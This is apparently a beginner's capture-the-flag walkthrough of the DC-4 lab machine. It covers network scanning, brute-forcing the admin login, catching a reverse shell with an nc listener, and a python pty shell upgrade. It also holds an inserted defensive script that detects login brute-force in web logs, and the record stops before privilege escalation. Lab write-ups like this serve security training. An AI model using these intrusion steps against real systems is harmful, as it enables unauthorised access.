DC-4 Penetration Target Machine Walkthrough

A beginner's walkthrough of the DC series target machines: DC-4

"DC-3 is too hard, sob, let's do DC-4 first"

1. Define the objective

Obtain root privileges on the target machine and find the flag under the root account

2. Information gathering

Use arp-scan to scan the hosts on the subnet
└─# arp-scan -l

Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.1.103
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     64:6e:97:04:b5:22       (Unknown)
192.168.1.101   58:a0:23:79:16:11       Intel Corporate
192.168.1.107   00:0c:29:aa:0f:0b       VMware, Inc.  <-- the target VM's address
192.168.1.102   64:6e:97:f4:58:64       (Unknown)
192.168.1.105   d4:d2:d6:a1:b9:28       (Unknown)
192.168.1.108   64:6e:97:f4:58:64       (Unknown)
192.168.1.100   48:2c:a0:e5:36:51       Xiaomi Communications Co Ltd
192.168.1.106   d4:d2:d6:a1:b9:28       (Unknown)

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.994 seconds (128.39 hosts/sec). 8 responded
Use an nmap script to scan the host for information
└─# nmap --script=vuln 192.168.1.107

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 09:49 CST
Nmap scan report for 192.168.1.107
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.107
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.107:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.107:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:AA:0F:0B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.30 seconds
Only a single CSRF finding, which is of no real use here
Visit the website and look for information

[Image 1 from the original post]

Looks like we log in as admin

3. Exploitation

Use Burp Suite to brute-force the password

Since I used usr/share/wordlist/dirb/big.txt and was not using the Professional edition, brute-forcing one request at a time takes too long

So I used King Crimson to skip this step; the password is happy
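From the defender's side of the brute-force step above, here is an added example (not code from the original post): a small Python detector that reads nginx access-log lines and flags a source IP that POSTs to /login.php many times in a short window, and whether a redirect (302) followed the burst. The log lines, the threshold and the window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample nginx access-log lines (assumption, not from the original post):
# one client hammers /login.php and then gets a 302, another client logs in normally.
SAMPLE_LOG = """\
192.168.1.103 - - [02/Sep/2021:09:55:01 +0800] "POST /login.php HTTP/1.1" 200 512
192.168.1.103 - - [02/Sep/2021:09:55:01 +0800] "POST /login.php HTTP/1.1" 200 512
192.168.1.103 - - [02/Sep/2021:09:55:02 +0800] "POST /login.php HTTP/1.1" 200 512
192.168.1.103 - - [02/Sep/2021:09:55:02 +0800] "POST /login.php HTTP/1.1" 200 512
192.168.1.103 - - [02/Sep/2021:09:55:03 +0800] "POST /login.php HTTP/1.1" 200 512
192.168.1.103 - - [02/Sep/2021:09:55:03 +0800] "POST /login.php HTTP/1.1" 302 0
192.168.1.105 - - [02/Sep/2021:09:55:10 +0800] "GET /index.php HTTP/1.1" 200 1024
192.168.1.105 - - [02/Sep/2021:09:56:40 +0800] "POST /login.php HTTP/1.1" 302 0
"""

# Combined-log-format prefix: client ip, timestamp, request line, status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}

def detect_login_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: (max_posts_in_window, redirect_after_burst)} for every client that
    sent at least `threshold` POSTs to /login.php inside any `window`-long span."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/login.php"):
            posts[rec["ip"]].append(rec)
    hits = {}
    for ip, recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        start, best, hit_at = 0, 0, None
        for end in range(len(recs)):          # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hit_at = end if hit_at is None else hit_at
                best = max(best, count)
        if hit_at is not None:                # a 302 after the burst suggests a valid guess
            hits[ip] = (best, any(r["status"] == 302 for r in recs[hit_at:]))
    return hits
```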

[Image 2 from the original post]

Capture the request with Burp Suite and try to get a reverse shell with nc

[Image 3 from the original post]

Shell obtained

└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.1.107: inverse host lookup failed: Unknown host
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.107] 45952
ls
command.php
css
images
index.php
login.php
logout.php
Upgrade the shell to an interactive one
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data
www-data@dc-4:/usr/share/nginx/html$ 
Go into the /home directory
